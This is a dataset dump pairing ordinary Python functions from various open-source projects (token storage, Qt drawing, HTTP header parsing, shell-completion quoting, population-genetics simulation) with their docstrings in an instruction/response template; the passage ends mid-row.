code
stringlengths 75
104k
| docstring
stringlengths 1
46.9k
| text
stringlengths 164
112k
|
---|---|---|
def rm_token(opts, tok):
'''
Remove token from the store.
:param opts: Salt master config options
:param tok: Token to remove
:returns: Empty dict if successful. None if failed.
'''
t_path = os.path.join(opts['token_dir'], tok)
try:
os.remove(t_path)
return {}
except (IOError, OSError):
log.warning('Could not remove token %s', tok) | Remove token from the store.
:param opts: Salt master config options
:param tok: Token to remove
:returns: Empty dict if successful. None if failed. | Below is the the instruction that describes the task:
### Input:
Remove token from the store.
:param opts: Salt master config options
:param tok: Token to remove
:returns: Empty dict if successful. None if failed.
### Response:
def rm_token(opts, tok):
'''
Remove token from the store.
:param opts: Salt master config options
:param tok: Token to remove
:returns: Empty dict if successful. None if failed.
'''
t_path = os.path.join(opts['token_dir'], tok)
try:
os.remove(t_path)
return {}
except (IOError, OSError):
log.warning('Could not remove token %s', tok) |
def drawBackground( self, painter, opt, rect, brush ):
"""
Make sure the background extends to 0 for the first item.
:param painter | <QtGui.QPainter>
rect | <QtCore.QRect>
brush | <QtGui.QBrush>
"""
if not brush:
return
painter.setPen(QtCore.Qt.NoPen)
painter.setBrush(brush)
painter.drawRect(rect) | Make sure the background extends to 0 for the first item.
:param painter | <QtGui.QPainter>
rect | <QtCore.QRect>
brush | <QtGui.QBrush> | Below is the the instruction that describes the task:
### Input:
Make sure the background extends to 0 for the first item.
:param painter | <QtGui.QPainter>
rect | <QtCore.QRect>
brush | <QtGui.QBrush>
### Response:
def drawBackground( self, painter, opt, rect, brush ):
"""
Make sure the background extends to 0 for the first item.
:param painter | <QtGui.QPainter>
rect | <QtCore.QRect>
brush | <QtGui.QBrush>
"""
if not brush:
return
painter.setPen(QtCore.Qt.NoPen)
painter.setBrush(brush)
painter.drawRect(rect) |
def random_digit_or_empty(self):
"""
Returns a random digit/number
between 0 and 9 or an empty string.
"""
if self.generator.random.randint(0, 1):
return self.generator.random.randint(0, 9)
else:
return '' | Returns a random digit/number
between 0 and 9 or an empty string. | Below is the the instruction that describes the task:
### Input:
Returns a random digit/number
between 0 and 9 or an empty string.
### Response:
def random_digit_or_empty(self):
"""
Returns a random digit/number
between 0 and 9 or an empty string.
"""
if self.generator.random.randint(0, 1):
return self.generator.random.randint(0, 9)
else:
return '' |
def get_distinct_segments(self, left_offset = 0, right_offset = 0, sequence_length = None):
'''Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments
merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned
segments will be [(23, 40), (43, 46)].
This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.
The offsets are used to select the residues surrounding the loop regions. For example, i.e. if a sequence segment
is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so
that all possible 9-mers are considered.
'''
# Create a unique, sorted list of all loop terminus positions
positions = set()
for l in self.data:
assert(l['start'] <= l['end'])
if sequence_length:
# If we know the sequence length then we can return valid positions
positions = positions.union(range(max(1, l['start'] - left_offset + 1), min(sequence_length + 1, l['end'] + 1 + right_offset - 1))) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.
else:
# Otherwise, we may return positions outside the sequence length however Python splicing can handle this gracefully
positions = positions.union(range(max(1, l['start'] - left_offset + 1), l['end'] + 1 + right_offset - 1)) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.
positions = sorted(positions)
# Iterate through the list to define the segments
segments = []
current_start = None
last_position = None
for p in positions:
if current_start == None:
current_start = p
last_position = p
else:
if p == last_position + 1:
last_position = p
else:
segments.append((current_start, last_position))
current_start = p
last_position = p
if current_start and last_position:
segments.append((current_start, last_position))
return segments | Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments
merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned
segments will be [(23, 40), (43, 46)].
This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.
The offsets are used to select the residues surrounding the loop regions. For example, i.e. if a sequence segment
is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so
that all possible 9-mers are considered. | Below is the the instruction that describes the task:
### Input:
Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments
merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned
segments will be [(23, 40), (43, 46)].
This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.
The offsets are used to select the residues surrounding the loop regions. For example, i.e. if a sequence segment
is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so
that all possible 9-mers are considered.
### Response:
def get_distinct_segments(self, left_offset = 0, right_offset = 0, sequence_length = None):
'''Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments
merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned
segments will be [(23, 40), (43, 46)].
This may not be the fastest way to calculate this (numpy?) but that is probably not an issue.
The offsets are used to select the residues surrounding the loop regions. For example, i.e. if a sequence segment
is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so
that all possible 9-mers are considered.
'''
# Create a unique, sorted list of all loop terminus positions
positions = set()
for l in self.data:
assert(l['start'] <= l['end'])
if sequence_length:
# If we know the sequence length then we can return valid positions
positions = positions.union(range(max(1, l['start'] - left_offset + 1), min(sequence_length + 1, l['end'] + 1 + right_offset - 1))) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.
else:
# Otherwise, we may return positions outside the sequence length however Python splicing can handle this gracefully
positions = positions.union(range(max(1, l['start'] - left_offset + 1), l['end'] + 1 + right_offset - 1)) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.
positions = sorted(positions)
# Iterate through the list to define the segments
segments = []
current_start = None
last_position = None
for p in positions:
if current_start == None:
current_start = p
last_position = p
else:
if p == last_position + 1:
last_position = p
else:
segments.append((current_start, last_position))
current_start = p
last_position = p
if current_start and last_position:
segments.append((current_start, last_position))
return segments |
def set_edges(self, name: str, a: np.ndarray, b: np.ndarray, w: np.ndarray, *, axis: int) -> None:
"""
**DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
"""
deprecated("'set_edges' is deprecated. Use 'ds.row_graphs[name] = g' or 'ds.col_graphs[name] = g' instead")
try:
g = scipy.sparse.coo_matrix((w, (a, b)), (self.shape[axis], self.shape[axis]))
except Exception:
raise ValueError("Input arrays could not be converted to a sparse matrix")
if axis == 0:
self.row_graphs[name] = g
elif axis == 1:
self.col_graphs[name] = g
else:
raise ValueError("axis must be 0 (rows) or 1 (columns)") | **DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead | Below is the the instruction that describes the task:
### Input:
**DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
### Response:
def set_edges(self, name: str, a: np.ndarray, b: np.ndarray, w: np.ndarray, *, axis: int) -> None:
"""
**DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
"""
deprecated("'set_edges' is deprecated. Use 'ds.row_graphs[name] = g' or 'ds.col_graphs[name] = g' instead")
try:
g = scipy.sparse.coo_matrix((w, (a, b)), (self.shape[axis], self.shape[axis]))
except Exception:
raise ValueError("Input arrays could not be converted to a sparse matrix")
if axis == 0:
self.row_graphs[name] = g
elif axis == 1:
self.col_graphs[name] = g
else:
raise ValueError("axis must be 0 (rows) or 1 (columns)") |
def _validate_checksum(self, buffer):
"""Validate the buffer response against the checksum.
When reading the serial interface, data will come back in a raw format
with an included checksum process.
:returns: bool
"""
self._log.debug("Validating the buffer")
if len(buffer) == 0:
self._log.debug("Buffer was empty")
if self._conn.isOpen():
self._log.debug('Closing connection')
self._conn.close()
return False
p0 = hex2int(buffer[0])
p1 = hex2int(buffer[1])
checksum = sum([hex2int(c) for c in buffer[:35]]) & 0xFF
p35 = hex2int(buffer[35])
if p0 != 165 or p1 != 150 or p35 != checksum:
self._log.debug("Buffer checksum was not valid")
return False
return True | Validate the buffer response against the checksum.
When reading the serial interface, data will come back in a raw format
with an included checksum process.
:returns: bool | Below is the the instruction that describes the task:
### Input:
Validate the buffer response against the checksum.
When reading the serial interface, data will come back in a raw format
with an included checksum process.
:returns: bool
### Response:
def _validate_checksum(self, buffer):
"""Validate the buffer response against the checksum.
When reading the serial interface, data will come back in a raw format
with an included checksum process.
:returns: bool
"""
self._log.debug("Validating the buffer")
if len(buffer) == 0:
self._log.debug("Buffer was empty")
if self._conn.isOpen():
self._log.debug('Closing connection')
self._conn.close()
return False
p0 = hex2int(buffer[0])
p1 = hex2int(buffer[1])
checksum = sum([hex2int(c) for c in buffer[:35]]) & 0xFF
p35 = hex2int(buffer[35])
if p0 != 165 or p1 != 150 or p35 != checksum:
self._log.debug("Buffer checksum was not valid")
return False
return True |
def _mergedict(a, b):
"""Recusively merge the 2 dicts.
Destructive on argument 'a'.
"""
for p, d1 in b.items():
if p in a:
if not isinstance(d1, dict):
continue
_mergedict(a[p], d1)
else:
a[p] = d1
return a | Recusively merge the 2 dicts.
Destructive on argument 'a'. | Below is the the instruction that describes the task:
### Input:
Recusively merge the 2 dicts.
Destructive on argument 'a'.
### Response:
def _mergedict(a, b):
"""Recusively merge the 2 dicts.
Destructive on argument 'a'.
"""
for p, d1 in b.items():
if p in a:
if not isinstance(d1, dict):
continue
_mergedict(a[p], d1)
else:
a[p] = d1
return a |
def slicenet_middle(inputs_encoded, targets, target_space_emb, mask, hparams):
"""Middle part of slicenet, connecting encoder and decoder."""
def norm_fn(x, name):
with tf.variable_scope(name, default_name="norm"):
return common_layers.apply_norm(x, hparams.norm_type, hparams.hidden_size,
hparams.norm_epsilon)
# Flatten targets and embed target_space_id.
targets_flat = tf.expand_dims(common_layers.flatten4d3d(targets), axis=2)
target_space_emb = tf.tile(target_space_emb,
[tf.shape(targets_flat)[0], 1, 1, 1])
# Use attention from each target to look at input and retrieve.
targets_shifted = common_layers.shift_right(
targets_flat, pad_value=target_space_emb)
if hparams.attention_type == "none":
targets_with_attention = tf.zeros_like(targets_shifted)
else:
inputs_padding_bias = (1.0 - mask) * -1e9 # Bias to not attend to padding.
targets_with_attention = attention(
targets_shifted,
inputs_encoded,
norm_fn,
hparams,
bias=inputs_padding_bias)
# Positional targets: merge attention and raw.
kernel = (hparams.kernel_height, hparams.kernel_width)
targets_merged = common_layers.subseparable_conv_block(
tf.concat([targets_with_attention, targets_shifted], axis=3),
hparams.hidden_size, [((1, 1), kernel)],
normalizer_fn=norm_fn,
padding="LEFT",
separability=4,
name="targets_merge")
return targets_merged, 0.0 | Middle part of slicenet, connecting encoder and decoder. | Below is the the instruction that describes the task:
### Input:
Middle part of slicenet, connecting encoder and decoder.
### Response:
def slicenet_middle(inputs_encoded, targets, target_space_emb, mask, hparams):
"""Middle part of slicenet, connecting encoder and decoder."""
def norm_fn(x, name):
with tf.variable_scope(name, default_name="norm"):
return common_layers.apply_norm(x, hparams.norm_type, hparams.hidden_size,
hparams.norm_epsilon)
# Flatten targets and embed target_space_id.
targets_flat = tf.expand_dims(common_layers.flatten4d3d(targets), axis=2)
target_space_emb = tf.tile(target_space_emb,
[tf.shape(targets_flat)[0], 1, 1, 1])
# Use attention from each target to look at input and retrieve.
targets_shifted = common_layers.shift_right(
targets_flat, pad_value=target_space_emb)
if hparams.attention_type == "none":
targets_with_attention = tf.zeros_like(targets_shifted)
else:
inputs_padding_bias = (1.0 - mask) * -1e9 # Bias to not attend to padding.
targets_with_attention = attention(
targets_shifted,
inputs_encoded,
norm_fn,
hparams,
bias=inputs_padding_bias)
# Positional targets: merge attention and raw.
kernel = (hparams.kernel_height, hparams.kernel_width)
targets_merged = common_layers.subseparable_conv_block(
tf.concat([targets_with_attention, targets_shifted], axis=3),
hparams.hidden_size, [((1, 1), kernel)],
normalizer_fn=norm_fn,
padding="LEFT",
separability=4,
name="targets_merge")
return targets_merged, 0.0 |
def _get_file_stream(self, total_content_length, content_type, filename=None,
content_length=None):
"""Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because webbrowsers do not provide
this value.
"""
return default_stream_factory(total_content_length, content_type,
filename, content_length) | Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because webbrowsers do not provide
this value. | Below is the the instruction that describes the task:
### Input:
Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because webbrowsers do not provide
this value.
### Response:
def _get_file_stream(self, total_content_length, content_type, filename=None,
content_length=None):
"""Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because webbrowsers do not provide
this value.
"""
return default_stream_factory(total_content_length, content_type,
filename, content_length) |
def update_user(self, username, profile, owner_privkey):
"""
Update profile_hash on blockchain
"""
url = self.base_url + "/users/" + username + "/update"
owner_pubkey = get_pubkey_from_privkey(owner_privkey)
payload = {
'profile': profile,
'owner_pubkey': owner_pubkey
}
resp = self._post_request(url, payload)
try:
unsigned_tx = resp['unsigned_tx']
except:
return resp
dht_resp = write_dht_profile(profile)
dht_resp = dht_resp[0]
if not dht_resp['status'] == 'success':
return {"error": "DHT write failed"}
# sign all unsigned inputs
signed_tx = sign_all_unsigned_inputs(owner_privkey, unsigned_tx)
return self.broadcast_transaction(signed_tx) | Update profile_hash on blockchain | Below is the the instruction that describes the task:
### Input:
Update profile_hash on blockchain
### Response:
def update_user(self, username, profile, owner_privkey):
"""
Update profile_hash on blockchain
"""
url = self.base_url + "/users/" + username + "/update"
owner_pubkey = get_pubkey_from_privkey(owner_privkey)
payload = {
'profile': profile,
'owner_pubkey': owner_pubkey
}
resp = self._post_request(url, payload)
try:
unsigned_tx = resp['unsigned_tx']
except:
return resp
dht_resp = write_dht_profile(profile)
dht_resp = dht_resp[0]
if not dht_resp['status'] == 'success':
return {"error": "DHT write failed"}
# sign all unsigned inputs
signed_tx = sign_all_unsigned_inputs(owner_privkey, unsigned_tx)
return self.broadcast_transaction(signed_tx) |
def update(self, id, **dict):
'''Update a given item with the passed data.'''
if not self._item_path:
raise AttributeError('update is not available for %s' % self._item_name)
target = (self._update_path or self._item_path) % id
payload = json.dumps({self._item_type:dict})
self._redmine.put(target, payload)
return None | Update a given item with the passed data. | Below is the the instruction that describes the task:
### Input:
Update a given item with the passed data.
### Response:
def update(self, id, **dict):
'''Update a given item with the passed data.'''
if not self._item_path:
raise AttributeError('update is not available for %s' % self._item_name)
target = (self._update_path or self._item_path) % id
payload = json.dumps({self._item_type:dict})
self._redmine.put(target, payload)
return None |
def _bell(self):
u'''ring the bell if requested.'''
if self.bell_style == u'none':
pass
elif self.bell_style == u'visible':
raise NotImplementedError(u"Bellstyle visible is not implemented yet.")
elif self.bell_style == u'audible':
self.console.bell()
else:
raise ReadlineError(u"Bellstyle %s unknown."%self.bell_style) | u'''ring the bell if requested. | Below is the the instruction that describes the task:
### Input:
u'''ring the bell if requested.
### Response:
def _bell(self):
u'''ring the bell if requested.'''
if self.bell_style == u'none':
pass
elif self.bell_style == u'visible':
raise NotImplementedError(u"Bellstyle visible is not implemented yet.")
elif self.bell_style == u'audible':
self.console.bell()
else:
raise ReadlineError(u"Bellstyle %s unknown."%self.bell_style) |
def _read_http_header(self, header):
"""Read HTTP/1.* header.
Structure of HTTP/1.* header [RFC 7230]:
start-line :==: request-line / status-line
request-line :==: method SP request-target SP HTTP-version CRLF
status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
header-field :==: field-name ":" OWS field-value OWS
"""
try:
startline, headerfield = header.split(b'\r\n', 1)
para1, para2, para3 = re.split(rb'\s+', startline, 2)
fields = headerfield.split(b'\r\n')
lists = (re.split(rb'\s*:\s*', field, 1) for field in fields)
except ValueError:
raise ProtocolError('HTTP: invalid format', quiet=True)
match1 = re.match(_RE_METHOD, para1)
match2 = re.match(_RE_VERSION, para3)
match3 = re.match(_RE_VERSION, para1)
match4 = re.match(_RE_STATUS, para2)
if match1 and match2:
receipt = 'request'
header = dict(
request=dict(
method=self.decode(para1),
target=self.decode(para2),
version=self.decode(match2.group('version')),
),
)
elif match3 and match4:
receipt = 'response'
header = dict(
response=dict(
version=self.decode(match3.group('version')),
status=int(para2),
phrase=self.decode(para3),
),
)
else:
raise ProtocolError('HTTP: invalid format', quiet=True)
try:
for item in lists:
key = self.decode(item[0].strip()).replace(receipt, f'{receipt}_field')
value = self.decode(item[1].strip())
if key in header:
if isinstance(header[key], tuple):
header[key] += (value,)
else:
header[key] = (header[key], value)
else:
header[key] = value
except IndexError:
raise ProtocolError('HTTP: invalid format', quiet=True)
return header, receipt | Read HTTP/1.* header.
Structure of HTTP/1.* header [RFC 7230]:
start-line :==: request-line / status-line
request-line :==: method SP request-target SP HTTP-version CRLF
status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
header-field :==: field-name ":" OWS field-value OWS | Below is the the instruction that describes the task:
### Input:
Read HTTP/1.* header.
Structure of HTTP/1.* header [RFC 7230]:
start-line :==: request-line / status-line
request-line :==: method SP request-target SP HTTP-version CRLF
status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
header-field :==: field-name ":" OWS field-value OWS
### Response:
def _read_http_header(self, header):
"""Read HTTP/1.* header.
Structure of HTTP/1.* header [RFC 7230]:
start-line :==: request-line / status-line
request-line :==: method SP request-target SP HTTP-version CRLF
status-line :==: HTTP-version SP status-code SP reason-phrase CRLF
header-field :==: field-name ":" OWS field-value OWS
"""
try:
startline, headerfield = header.split(b'\r\n', 1)
para1, para2, para3 = re.split(rb'\s+', startline, 2)
fields = headerfield.split(b'\r\n')
lists = (re.split(rb'\s*:\s*', field, 1) for field in fields)
except ValueError:
raise ProtocolError('HTTP: invalid format', quiet=True)
match1 = re.match(_RE_METHOD, para1)
match2 = re.match(_RE_VERSION, para3)
match3 = re.match(_RE_VERSION, para1)
match4 = re.match(_RE_STATUS, para2)
if match1 and match2:
receipt = 'request'
header = dict(
request=dict(
method=self.decode(para1),
target=self.decode(para2),
version=self.decode(match2.group('version')),
),
)
elif match3 and match4:
receipt = 'response'
header = dict(
response=dict(
version=self.decode(match3.group('version')),
status=int(para2),
phrase=self.decode(para3),
),
)
else:
raise ProtocolError('HTTP: invalid format', quiet=True)
try:
for item in lists:
key = self.decode(item[0].strip()).replace(receipt, f'{receipt}_field')
value = self.decode(item[1].strip())
if key in header:
if isinstance(header[key], tuple):
header[key] += (value,)
else:
header[key] = (header[key], value)
else:
header[key] = value
except IndexError:
raise ProtocolError('HTTP: invalid format', quiet=True)
return header, receipt |
def _get_block(self):
"""Just read a single block from your current location in _fh"""
b = self._fh.read(4) # get block size bytes
#print self._fh.tell()
if not b: raise StopIteration
block_size = struct.unpack('<i',b)[0]
return self._fh.read(block_size) | Just read a single block from your current location in _fh | Below is the the instruction that describes the task:
### Input:
Just read a single block from your current location in _fh
### Response:
def _get_block(self):
"""Just read a single block from your current location in _fh"""
b = self._fh.read(4) # get block size bytes
#print self._fh.tell()
if not b: raise StopIteration
block_size = struct.unpack('<i',b)[0]
return self._fh.read(block_size) |
def response_minify(self, response):
"""
minify response html to decrease traffic
"""
if response.content_type == u'text/html; charset=utf-8':
endpoint = request.endpoint or ''
view_func = current_app.view_functions.get(endpoint, None)
name = (
'%s.%s' % (view_func.__module__, view_func.__name__)
if view_func else ''
)
if name in self._exempt_routes:
return response
response.direct_passthrough = False
response.set_data(
self._html_minify.minify(response.get_data(as_text=True))
)
return response
return response | minify response html to decrease traffic | Below is the the instruction that describes the task:
### Input:
minify response html to decrease traffic
### Response:
def response_minify(self, response):
"""
minify response html to decrease traffic
"""
if response.content_type == u'text/html; charset=utf-8':
endpoint = request.endpoint or ''
view_func = current_app.view_functions.get(endpoint, None)
name = (
'%s.%s' % (view_func.__module__, view_func.__name__)
if view_func else ''
)
if name in self._exempt_routes:
return response
response.direct_passthrough = False
response.set_data(
self._html_minify.minify(response.get_data(as_text=True))
)
return response
return response |
def _simulate(self, nreps, admix=None, Ns=500000, gen=20):
"""
Enter a baba.Tree object in which the 'tree' attribute (newick
derived tree) has edge lengths in units of generations. You can
use the 'gen' parameter to multiply branch lengths by a constant.
Parameters:
-----------
nreps: (int)
Number of reps (loci) to simulate under the demographic scenario
tree: (baba.Tree object)
A baba.Tree object initialized by calling baba.Tree(*args).
admix: (list)
A list of admixture events to occur on the tree. Nodes must be
reference by their index number, and events must occur in time
intervals when edges exist. Use the .draw() function of the
baba.Tree object to see node index numbers and coalescent times.
Ns: (float)
Fixed effective population size for all lineages (may allow to vary
in the future).
gen: (int)
A multiplier applied to branch lengths to scale into units of
generations. Example, if all edges on a tree were 1 then you might
enter 50000 to multiply so that edges are 50K generations long.
"""
## node ages
Taus = np.array(list(set(self.verts[:, 1]))) * 1e4 * gen
## The tips samples, ordered alphanumerically
## Population IDs correspond to their indexes in pop config
ntips = len(self.tree)
#names = {name: idx for idx, name in enumerate(sorted(self.tree.get_leaf_names()))}
## rev ladderized leaf name order (left to right on downward facing tree)
names = {name: idx for idx, name in enumerate(self.tree.get_leaf_names()[::-1])}
pop_config = [
ms.PopulationConfiguration(sample_size=2, initial_size=Ns)
for i in range(ntips)
]
## migration matrix all zeros init
migmat = np.zeros((ntips, ntips)).tolist()
## a list for storing demographic events
demog = []
## coalescent times
coals = sorted(list(set(self.verts[:, 1])))[1:]
for ct in xrange(len(coals)):
## check for admix event before next coalescence
## ...
## print coals[ct], nidxs, time
nidxs = np.where(self.verts[:, 1] == coals[ct])[0]
time = Taus[ct+1]
## add coalescence at each node
for nidx in nidxs:
node = self.tree.search_nodes(name=str(nidx))[0]
## get destionation (lowest child idx number), and other
dest = sorted(node.get_leaves(), key=lambda x: x.idx)[0]
otherchild = [i for i in node.children if not
i.get_leaves_by_name(dest.name)][0]
## get source
if otherchild.is_leaf():
source = otherchild
else:
source = sorted(otherchild.get_leaves(), key=lambda x: x.idx)[0]
## add coal events
event = ms.MassMigration(
time=int(time),
source=names[source.name],
destination=names[dest.name],
proportion=1.0)
#print(int(time), names[source.name], names[dest.name])
## ...
demog.append(event)
## sim the data
replicates = ms.simulate(
population_configurations=pop_config,
migration_matrix=migmat,
demographic_events=demog,
num_replicates=nreps,
length=100,
mutation_rate=1e-8)
return replicates | Enter a baba.Tree object in which the 'tree' attribute (newick
derived tree) has edge lengths in units of generations. You can
use the 'gen' parameter to multiply branch lengths by a constant.
Parameters:
-----------
nreps: (int)
Number of reps (loci) to simulate under the demographic scenario
tree: (baba.Tree object)
A baba.Tree object initialized by calling baba.Tree(*args).
admix: (list)
A list of admixture events to occur on the tree. Nodes must be
reference by their index number, and events must occur in time
intervals when edges exist. Use the .draw() function of the
baba.Tree object to see node index numbers and coalescent times.
Ns: (float)
Fixed effective population size for all lineages (may allow to vary
in the future).
gen: (int)
A multiplier applied to branch lengths to scale into units of
generations. Example, if all edges on a tree were 1 then you might
enter 50000 to multiply so that edges are 50K generations long. | Below is the the instruction that describes the task:
### Input:
Enter a baba.Tree object in which the 'tree' attribute (newick
derived tree) has edge lengths in units of generations. You can
use the 'gen' parameter to multiply branch lengths by a constant.
Parameters:
-----------
nreps: (int)
Number of reps (loci) to simulate under the demographic scenario
tree: (baba.Tree object)
A baba.Tree object initialized by calling baba.Tree(*args).
admix: (list)
A list of admixture events to occur on the tree. Nodes must be
reference by their index number, and events must occur in time
intervals when edges exist. Use the .draw() function of the
baba.Tree object to see node index numbers and coalescent times.
Ns: (float)
Fixed effective population size for all lineages (may allow to vary
in the future).
gen: (int)
A multiplier applied to branch lengths to scale into units of
generations. Example, if all edges on a tree were 1 then you might
enter 50000 to multiply so that edges are 50K generations long.
### Response:
def _simulate(self, nreps, admix=None, Ns=500000, gen=20):
"""
Enter a baba.Tree object in which the 'tree' attribute (newick
derived tree) has edge lengths in units of generations. You can
use the 'gen' parameter to multiply branch lengths by a constant.
Parameters:
-----------
nreps: (int)
Number of reps (loci) to simulate under the demographic scenario
tree: (baba.Tree object)
A baba.Tree object initialized by calling baba.Tree(*args).
admix: (list)
A list of admixture events to occur on the tree. Nodes must be
reference by their index number, and events must occur in time
intervals when edges exist. Use the .draw() function of the
baba.Tree object to see node index numbers and coalescent times.
Ns: (float)
Fixed effective population size for all lineages (may allow to vary
in the future).
gen: (int)
A multiplier applied to branch lengths to scale into units of
generations. Example, if all edges on a tree were 1 then you might
enter 50000 to multiply so that edges are 50K generations long.
"""
## node ages
Taus = np.array(list(set(self.verts[:, 1]))) * 1e4 * gen
## The tips samples, ordered alphanumerically
## Population IDs correspond to their indexes in pop config
ntips = len(self.tree)
#names = {name: idx for idx, name in enumerate(sorted(self.tree.get_leaf_names()))}
## rev ladderized leaf name order (left to right on downward facing tree)
names = {name: idx for idx, name in enumerate(self.tree.get_leaf_names()[::-1])}
pop_config = [
ms.PopulationConfiguration(sample_size=2, initial_size=Ns)
for i in range(ntips)
]
## migration matrix all zeros init
migmat = np.zeros((ntips, ntips)).tolist()
## a list for storing demographic events
demog = []
## coalescent times
coals = sorted(list(set(self.verts[:, 1])))[1:]
for ct in xrange(len(coals)):
## check for admix event before next coalescence
## ...
## print coals[ct], nidxs, time
nidxs = np.where(self.verts[:, 1] == coals[ct])[0]
time = Taus[ct+1]
## add coalescence at each node
for nidx in nidxs:
node = self.tree.search_nodes(name=str(nidx))[0]
## get destionation (lowest child idx number), and other
dest = sorted(node.get_leaves(), key=lambda x: x.idx)[0]
otherchild = [i for i in node.children if not
i.get_leaves_by_name(dest.name)][0]
## get source
if otherchild.is_leaf():
source = otherchild
else:
source = sorted(otherchild.get_leaves(), key=lambda x: x.idx)[0]
## add coal events
event = ms.MassMigration(
time=int(time),
source=names[source.name],
destination=names[dest.name],
proportion=1.0)
#print(int(time), names[source.name], names[dest.name])
## ...
demog.append(event)
## sim the data
replicates = ms.simulate(
population_configurations=pop_config,
migration_matrix=migmat,
demographic_events=demog,
num_replicates=nreps,
length=100,
mutation_rate=1e-8)
return replicates |
def quote_completions(self, completions, cword_prequote, last_wordbreak_pos):
"""
If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.
If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
adds a space after the completion.
This method is exposed for overriding in subclasses; there is no need to use it directly.
"""
special_chars = "\\"
# If the word under the cursor was quoted, escape the quote char.
# Otherwise, escape all special characters and specially handle all COMP_WORDBREAKS chars.
if cword_prequote == "":
# Bash mangles completions which contain characters in COMP_WORDBREAKS.
# This workaround has the same effect as __ltrim_colon_completions in bash_completion
# (extended to characters other than the colon).
if last_wordbreak_pos:
completions = [c[last_wordbreak_pos + 1:] for c in completions]
special_chars += "();<>|&!`$* \t\n\"'"
elif cword_prequote == '"':
special_chars += '"`$!'
if os.environ.get("_ARGCOMPLETE_SHELL") == "tcsh":
# tcsh escapes special characters itself.
special_chars = ""
elif cword_prequote == "'":
# Nothing can be escaped in single quotes, so we need to close
# the string, escape the single quote, then open a new string.
special_chars = ""
completions = [c.replace("'", r"'\''") for c in completions]
for char in special_chars:
completions = [c.replace(char, "\\" + char) for c in completions]
if self.append_space:
# Similar functionality in bash was previously turned off by supplying the "-o nospace" option to complete.
# Now it is conditionally disabled using "compopt -o nospace" if the match ends in a continuation character.
# This code is retained for environments where this isn't done natively.
continuation_chars = "=/:"
if len(completions) == 1 and completions[0][-1] not in continuation_chars:
if cword_prequote == "":
completions[0] += " "
return completions | If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.
If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
adds a space after the completion.
This method is exposed for overriding in subclasses; there is no need to use it directly. | Below is the the instruction that describes the task:
### Input:
If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
